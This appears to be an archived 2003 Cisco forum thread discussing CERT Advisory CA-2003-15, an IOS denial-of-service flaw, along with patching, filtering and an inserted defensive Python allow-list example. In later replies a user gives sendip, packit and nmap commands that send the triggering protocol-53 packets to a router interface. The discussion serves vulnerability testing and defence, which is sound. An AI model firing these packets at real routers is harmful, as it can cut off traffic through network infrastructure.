Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet

Discussion in 'Cisco' started by Alan Lee, Jul 17, 2003.

  1. Alan Lee Guest

    Anybody read the latest advisory from CERT?
     
    Alan Lee, Jul 17, 2003
    #1

  2. James black Guest

    "Alan Lee" <> wrote in message news:<3f1631be$>...
    > Anybody read the latest advisory from CERT?

    I've read the advisory. It doesn't sound like Cisco really has it
    fixed; their site indicates that the workaround only permits an
    affected router to be reloaded by adding a new value called
    hold-queue.

    see below from http://www.cisco.com/en/US/products...ducts_security_advisory09186a00801a34c2.shtml

    Workarounds
    AFTER APPLYING THE WORKAROUND the input queue depth may be raised with
    the hold-queue <new value> in interface command -- the default size is
    75. This will allow traffic flow on the interface until the device can
    be reloaded.
     
    James black, Jul 17, 2003
    #2

  3. I have. I know Globix are scheduling IOS updates this evening to stop
    the possibility. I'm sure this board is quiet because everyone is off
    TFTPing images all day, much like myself.

    "Alan Lee" <> wrote in message news:<3f1631be$>...
    > Anybody read the latest advisory from CERT?
     
    Stephen Evans, Jul 17, 2003
    #3
  4. Bill F Guest

    Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet

    I just did. It's a bit ambiguous in its description. "...rare sequence
    of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    or IDS system block such an attack? It seems as though this is a risk
    to perimeter devices only. Is there really any need to be concerned
    with internal devices, i.e. privately addressed devices behind a firewall?

    I also find it interesting that there are images with a fix that
    pre-date this advisory. Was it a known bug that was just discovered to
    be a security risk? The advisory says there are no known exploitations
    of the vulnerability.

    Alan Lee wrote:
    > Anybody read the latest advisory from CERT?
    >
    >
     
    Bill F, Jul 17, 2003
    #4
  5. Chris Guest

    "Alan Lee" <> wrote in message
    news:3f1631be$...
    > Anybody read the latest advisory from CERT?
    >


    Hmmm .... downloads from Cisco were running quite slow today. Looks like my
    trusty TFTP server will be working some overtime along with me ;-)
     
    Chris, Jul 17, 2003
    #5
  6. Also what is ambiguous is the phrase "sent directly to the device".
    What type of packets are sent directly to a device? I would say that
    device management protocols such as telnet and SNMP go directly to the
    router. But are packets routed by a router considered being sent
    directly to the device? And what type of packets would be classified
    as being indirectly sent to an IOS device?

    Bill F <> wrote in message news:<>...
    > I just did. It's a bit ambiguous in its description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >
     
    Steve Himebaugh, Jul 17, 2003
    #6
  7. In article <>,
    Steve Himebaugh <> wrote:
    >Also what is ambiguous is the phrase "sent directly to the device".
    >What type of packets are sent directly to a device? I would say that
    >device management protocols such as telnet and SNMP go directly to the
    >router. But are packets routed by a router considered being sent
    >directly to the device? And what type of packets would be classified
    >as being indirectly sent to an IOS device?


    I interpret that as meaning "whose destination address is the device". And
    in this case, the types of packets that would be sent directly to the
    device are the carefully-crafted packets from someone trying to make the
    router fail. All he has to do is look at a traceroute to find the
    addresses of lots of routers, and then send exploit packets to them.

    --
    Barry Margolin,
    Level(3), Woburn, MA
    *** DON'T SEND TECHNICAL QUESTIONS DIRECTLY TO ME, post them to newsgroups.
    Please DON'T copy followups to me -- I'll assume it wasn't posted to the group.
     
    Barry Margolin, Jul 17, 2003
    #7
  8. Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet

    The internal threat assessment is really up to you. My concern, depending on
    the size of your infrastructure, is that once more public information becomes
    available this exploit could then be designed as some type of worm. As a
    result any laptop that enters your company, such as a contractor or mobile
    user, could unknowingly cause you serious grief.


    David Wolfenbarger
    ----------
    Bill F <> wrote...

    > I just did. It's a bit ambiguous in its description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >

    >
     
    David Wolfenbarger, Jul 18, 2003
    #8
  9. Dave Phelps Guest

    Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet

    In article <>, says...
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    >

    Why is that surprising? Most vendors, including Cisco, are aware of bugs/issues prior to
    the formal announcement. This gives them time to develop resolutions before the
    information becomes common knowledge. The alternative, vendors announcing the problem
    without patches available, would be much worse.

    Less common is the attack that is discovered and exploited by a cracker prior to a
    vendor's knowledge of the vulnerability.

    --
    Dave Phelps
    DD Networks
    www.ddnets.com
    deadspam=tippenring
     
    Dave Phelps, Jul 18, 2003
    #9
  10. CybrSage Guest

    If you read Cisco's advisory, you will see there are many versions of IOS
    that are not able to be exploited by this. All the 12.3 IOSs are safe.

    Directly sent to device means using the device's IP address, such as if you
    wanted to telnet into the router via the Internet to configure it.

    "Alan Lee" <> wrote in message
    news:3f1631be$...
    > Anybody read the latest advisory from CERT?
    >
    >
     
    CybrSage, Jul 18, 2003
    #10
  11. They have updated the paper describing this at
    http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml

    <QUOTE> Cisco routers are configured to process and accept Internet Protocol
    version 4 (IPv4) packets by default. A rare, specially crafted sequence of
    IPv4 packets with protocol type 53 (SWIPE), 55 (IP Mobility), 77 (Sun ND),
    or 103 (Protocol Independent Multicast - PIM) which is handled by the
    processor on a Cisco IOS device may force the device to incorrectly flag the
    input queue on an interface as full, which will cause the router to stop
    processing inbound traffic on that interface. This can cause routing
    protocols to drop due to dead timers. <UNQUOTE>

    I usually add access lists allowing only the peers or my management station
    to access the IP addresses attributed to any interface on the router.
    Transit traffic does not get filtered by this. After Cisco disclosed those
    ports, hackers seem to have started targeting....

    Peter B


    "Bill F" <> wrote in message
    news:...
    > I just did. It's a bit ambiguous in its description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >

    >
     
    Peter Buelens, Jul 18, 2003
    #11
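    The filtering Peter B. describes (packets addressed to the router's own interface addresses are restricted to known peers and the management station, while transit traffic passes untouched) can be checked against raw IPv4 headers. The following is an added example, not code from the thread or from Cisco; the protocol numbers are the four named in the advisory quoted above, and the router, peer and management addresses are constructed for the example.

```python
"""Allow-list check for the IPv4 input-queue issue in CA-2003-15.

Added example. Parses raw IPv4 headers and classifies each packet as
transit (not addressed to the router), permit, or deny (affected
protocol, addressed to the router, from an unapproved source)."""
import struct
from ipaddress import ip_address

# Protocol numbers named in cisco-sa-20030717-blocked.
AFFECTED_PROTOCOLS = {53: "SWIPE", 55: "IP Mobility", 77: "Sun ND", 103: "PIM"}

# Hypothetical addressing, constructed for this example.
ROUTER_ADDRESSES = {"192.0.2.1", "198.51.100.1"}
APPROVED_SOURCES = {"198.51.100.2", "192.0.2.100"}   # routing peer, mgmt station


def parse_ipv4_header(pkt: bytes) -> dict:
    """Decode the fields of the fixed 20-byte IPv4 header we need."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, _tot_len, _ident, _frag, ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    return {"ttl": ttl, "proto": proto,
            "src": str(ip_address(src)), "dst": str(ip_address(dst))}


def classify(pkt: bytes) -> str:
    """Return 'transit', 'permit' or 'deny' for one packet."""
    h = parse_ipv4_header(pkt)
    if h["dst"] not in ROUTER_ADDRESSES:
        return "transit"      # routed through; not "sent directly to the device"
    if h["proto"] not in AFFECTED_PROTOCOLS:
        return "permit"       # other protocols are outside this advisory
    if h["src"] in APPROVED_SOURCES:
        return "permit"       # peer or management station may reach the router
    return "deny"


def build_ipv4(src: str, dst: str, proto: int, ttl: int = 64) -> bytes:
    """Construct a minimal IPv4 header (checksum left zero) as sample input."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, ttl, proto, 0,
                       ip_address(src).packed, ip_address(dst).packed)


def audit(packets) -> dict:
    """Count classifications over a list of raw packets."""
    counts = {"transit": 0, "permit": 0, "deny": 0}
    for p in packets:
        counts[classify(p)] += 1
    return counts
```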
  12. On Thu, 17 Jul 2003 18:49:46 GMT, Bill F <> wrote:

    >I just did. It's a bit ambiguous in its description. "...rare sequence
    >of crafted IPv4 packets.." Couldn't they be more specific?


    If they were they would increase the chances of an attack.


    Also note that if any genuine packets to the interface get into the middle of
    the sequence, the exploit will fail.

    Paul.
     
    Paul Matthews, Jul 21, 2003
    #12
  13. On Thu, 17 Jul 2003 22:43:42 GMT, Barry Margolin <>
    wrote:

    >I interpret that as meaning "whose destination address is the device".


    Yup. Confirmed by my SE.

    In a well protected network, the routers should already be protected from
    traffic to the router from unknown sources.
    --
    Paul Matthews CCIE #4063
     
    Paul Matthews, Jul 21, 2003
    #13
  14. Hi,

    "Bill F" <> wrote in message
    news:...
    > I just did. It's a bit ambiguous in its description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific?


    According to:
    http://www.netsys.com/cgi-bin/displaynews?a=611
    There is no "Special Crafted" packet needed for the exploit to occur.

    Which makes me wonder, what type of application could I use to test/verify
    the presence of the bug on my routers?
    Any ideas?

    Regards
    Martin Bilgrav


    > Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >

    >
     
    Martin Bilgrav, Jul 22, 2003
    #14
  15. Thx for the tip, though I do not run unix.
    Regards
    Martin

    "fugi" <> wrote in message
    news:...
    > Martin Bilgrav <> wrote:
    > > Hi,

    >
    > do you run unix? if so use packit, hping or sendip. I prefer sendip.
    > such as...
    >
    > sendip -f payload -p ipv4 -iy 0 -ii 0 -ifd 0 -it <ttl> -ip 53 -is <src

    addr> -id <dst addr> <dst addr>
    >
    > file payload can be anything or omitted. all those flags aren't
    > necessary, I just wanted to specify and not rely on defaults.
    >
    > here's the packit example
    >
    > packit -t RAWIP -V 53 -d <dst addr> -T <ttl>
    >
    > the TTL must be 0 when it reaches the interface.
    >
    > I also wrote some C source that does it, a lil faster and more debugging.
    >
    > note that all 4 protocols are not necessary. everyone seemed to
    > miss the word *OR* in Cisco's release.
    >
    > and if it's across the net do an nmap -v -sO <dst addr> to make
    > sure those protocols aren't filtered, which has been the case with
    > many providers across their nets.
    >
    > if you have anything else as I don't often read this group.
    >
    > > "Bill F" <> wrote in message
    > > news:...
    > >> I just did. It's a bit ambiguous in its description. "...rare sequence
    > >> of crafted IPv4 packets.." Couldn't they be more specific?

    >
    > > According to:
    > > http://www.netsys.com/cgi-bin/displaynews?a=611
    > > There is no "Special Crafted" packet needed for the exploit to occur.
    >
    > > Which makes me wonder, what type of application could I use to test/verify
    > > the presence of the bug on my routers?
    > > Any ideas?

    >
    > > Regards
    > > Martin Bilgrav

    >
    >
    > >> Will a pix
    > >> or IDS system block such an attack? It seems as though this is a risk
    > >> to perimeter devices only. Is there really any need to be concerned
    > >> with internal devices, i.e. privately addressed devices behind a

    firewall?
    > >>
    > >> I also find it interesting that there are images with a fix that
    > >> pre-date this advisory. Was it a known bug that was just discovered to
    > >> be a security risk? The advisory says there are no known exploitations
    > >> of the vulnerability.
    > >>
    > >> Alan Lee wrote:
    > >> > Anybody read the latest advisory from CERT?
    > >> >
    > >> >
    > >>

    >
    >
    >
    > --
    > The complexity of a weapon is inversely proportional to the IQ of
    > the weapon's operator.
     
    Martin Bilgrav, Jul 23, 2003
    #15
  16. fugi Guest

    Martin Bilgrav <> wrote:
    > Thx for the tip, though I do not run unix.
    > Regards
    > Martin


    no better time to start than now then. freebsd.org netbsd.org
    openbsd.org Solaris is ported to x86 or I got an old 50MHz HP
    running HP-UX 11, QNX will run embedded in a toaster, or you could
    pop linux on a spare hard drive and use it for diagnostics like so
    and packet sniffing.

    > "fugi" <> wrote in message
    > news:...
    >> Martin Bilgrav <> wrote:
    >> > Hi,

    >>
    >> do you run unix? if so use packit, hping or sendip. I prefer sendip.
    >> such as...
    >>
    >> sendip -f payload -p ipv4 -iy 0 -ii 0 -ifd 0 -it <ttl> -ip 53 -is <src

    > addr> -id <dst addr> <dst addr>
    >>
    >> file payload can be anything or omitted. all those flags aren't
    >> necessary, I just wanted to specify and not rely on defaults.
    >>
    >> here's the packit example
    >>
    >> packit -t RAWIP -V 53 -d <dst addr> -T <ttl>
    >>
    >> the TTL must be 0 when it reaches the interface.
    >>
    >> I also wrote some C source that does it, a lil faster and more debugging.
    >>
    >> note that all 4 protocols are not necessary. everyone seemed to
    >> miss the word *OR* in Cisco's release.
    >>
    >> and if it's across the net do an nmap -v -sO <dst addr> to make
    >> sure those protocols aren't filtered, which has been the case with
    >> many providers across their nets.
    >>
    >> if you have anything else as I don't often read this group.
    >>
    >> > "Bill F" <> wrote in message
    >> > news:...
    >> >> I just did. It's a bit ambiguous in its description. "...rare sequence
    >> >> of crafted IPv4 packets.." Couldn't they be more specific?

    >>
    >> > According to:
    >> > http://www.netsys.com/cgi-bin/displaynews?a=611
    >> > There is no "Special Crafted" packet needed for the exploit to occur.
    >>
    >> > Which makes me wonder, what type of application could I use to test/verify
    >> > the presence of the bug on my routers?
    >> > Any ideas?

    >>
    >> > Regards
    >> > Martin Bilgrav

    >>
    >>
    >> >> Will a pix
    >> >> or IDS system block such an attack? It seems as though this is a risk
    >> >> to perimeter devices only. Is there really any need to be concerned
    >> >> with internal devices, i.e. privately addressed devices behind a

    > firewall?
    >> >>
    >> >> I also find it interesting that there are images with a fix that
    >> >> pre-date this advisory. Was it a known bug that was just discovered to
    >> >> be a security risk? The advisory says there are no known exploitations
    >> >> of the vulnerability.
    >> >>
    >> >> Alan Lee wrote:
    >> >> > Anybody read the latest advisory from CERT?
    >> >> >
    >> >> >
    >> >>

    >>
    >>
    >>
    >> --
    >> The complexity of a weapon is inversely proportional to the IQ of
    >> the weapon's operator.
    --
    The complexity of a weapon is inversely proportional to the IQ of
    the weapon's operator.
     
    fugi, Jul 23, 2003
    #16
  17. "fugi" <> wrote in message
    news:...

    > no better time to start than now then. freebsd.org netbsd.org
    > openbsd.org Solaris is ported to x86 or I got an old 50MHz HP
    > running HP-UX 11, QNX will run embedded in a toaster, or you could
    > pop linux on a spare harddrive and use it for diagnostics like so
    > and packet sniffing.


    LOL - Yeah, I know, Fugi ...
    Just never did have time enough to get to learn unix in depth enough to use
    it as a power tool.
    I have tried QNX booted from a single floppy though, with internet dialer and
    browser!
    Amazing - all on a floppy! really rox!
    I know QNX is used industrially in a lot more stuff than you can imagine.

    Take care !

    BR
    Martin
     
    Martin Bilgrav, Jul 23, 2003
    #17
